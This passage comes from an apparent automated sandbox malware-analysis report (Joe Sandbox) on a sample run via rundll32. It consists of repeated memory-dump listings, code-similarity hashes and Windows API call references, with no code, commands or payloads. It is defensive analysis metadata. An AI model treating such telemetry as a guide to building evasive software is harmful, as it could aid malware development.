                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$Info$Valid
                          • String ID:
                          • API String ID: 1826331170-0
                          • Opcode ID: 758832ac8bfc747b38319bcf7e9e6b8ebdb2f8f58ab823f02b5fd08fc2440837
                          • Instruction ID: 82bd8e35acb4018011bb46240219f5a68b361100da04a9b519d270e8b6329376
                          • Opcode Fuzzy Hash: 758832ac8bfc747b38319bcf7e9e6b8ebdb2f8f58ab823f02b5fd08fc2440837
                          • Instruction Fuzzy Hash: C841A972300A848ADB14DFA2D8507ED2726F784798F90802BEE5D47F98DB3CC599C399
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a598e5603234048a23161fdfb36fba7c113134fbf38ddcad901b3747140f00b
                          • Instruction ID: e68a09c6c25a65edcf2826e8d8e7b3c8c80d17a3536d123f320973ba5c3fc64f
                          • Opcode Fuzzy Hash: 4a598e5603234048a23161fdfb36fba7c113134fbf38ddcad901b3747140f00b
                          • Instruction Fuzzy Hash: A5822672204B848ECB30DF36C8503EA73A1F74979CF10611AEA4A4BB98DF79D945C749
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __common_dcos_data.LIBCMT ref: 0040F88D
                          • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,0040F95B,?,?,?,0040F325), ref: 0040F899
                          • WriteFile.KERNEL32 ref: 0040F8BD
                          • GetStdHandle.KERNEL32 ref: 0040F8C8
                          • WriteFile.KERNEL32 ref: 0040F8F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: FileHandleWrite$__common_dcos_data
                          • String ID: Error$Runtime error at 0000000000000000
                          • API String ID: 740718552-326393251
                          • Opcode ID: 070fba69d8a5bcb29964618e460a9d80e3c70cf3f3964462300974bbb9dce72b
                          • Instruction ID: 20fb6c4a0657809cdbbec2f032652b898e0eeca434463997dcb0e629c2332502
                          • Opcode Fuzzy Hash: 070fba69d8a5bcb29964618e460a9d80e3c70cf3f3964462300974bbb9dce72b
                          • Instruction Fuzzy Hash: 7B11D6E160564494FB20F762E8153963230BB84B58FC0C13BA99A16BE1CF7CC68CC34D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 0040DFA0: GetCurrentThreadId.KERNEL32 ref: 0040DFA8
                          • GetTickCount.KERNEL32 ref: 0040D9A6
                          • GetTickCount.KERNEL32 ref: 0040D9BF
                          • GetCurrentThreadId.KERNEL32 ref: 0040D9F9
                          • GetTickCount.KERNEL32 ref: 0040DA2C
                          • GetTickCount.KERNEL32 ref: 0040DA65
                          • GetTickCount.KERNEL32 ref: 0040DA93
                          • GetCurrentThreadId.KERNEL32 ref: 0040DB03
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CountTick$CurrentThread
                          • String ID:
                          • API String ID: 3968769311-0
                          • Opcode ID: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                          • Instruction ID: c2a83c2f389e5ad77d80a0aa6aea5129f58ee2ceaede3d7cabad914c36d9a5fa
                          • Opcode Fuzzy Hash: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                          • Instruction Fuzzy Hash: B241D776B0560189DB145EBEC94035B3A60F78C7ACB16513BEE0EE37D4CA39C8898788
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0040F970
                          • FreeLibrary.KERNEL32(?,?,?,0040F325), ref: 0040FA49
                          • ExitProcess.KERNEL32(?,?,?,0040F325), ref: 0040FA9D
                            • Part of subcall function 0040F860: __common_dcos_data.LIBCMT ref: 0040F88D
                            • Part of subcall function 0040F860: GetStdHandle.KERNEL32(?,?,?,?,?,?,?,0040F95B,?,?,?,0040F325), ref: 0040F899
                            • Part of subcall function 0040F860: WriteFile.KERNEL32 ref: 0040F8BD
                            • Part of subcall function 0040F860: GetStdHandle.KERNEL32 ref: 0040F8C8
                            • Part of subcall function 0040F860: WriteFile.KERNEL32 ref: 0040F8F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread__common_dcos_data
                          • String ID: OnValueNotify$ FC
                          • API String ID: 4067157052-3812416492
                          • Opcode ID: e7b4b1e238a0fdd7a446e6298bae5860d3bb016bb2fbf543ab2f061a04e3d20e
                          • Instruction ID: 1cb73d346c8814f1dc7751ffd2fc3dc8cc8e26bccb2e1f15f426acb64dc95275
                          • Opcode Fuzzy Hash: e7b4b1e238a0fdd7a446e6298bae5860d3bb016bb2fbf543ab2f061a04e3d20e
                          • Instruction Fuzzy Hash: 8241EDA0504A4498FB35EB66FC493662BA1BB40348FD4C13BC48D22BE5DF7C588CC769
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32 ref: 0040D60A
                          • GetProcAddress.KERNEL32 ref: 0040D619
                          • GetLogicalProcessorInformation.KERNEL32 ref: 0040D655
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
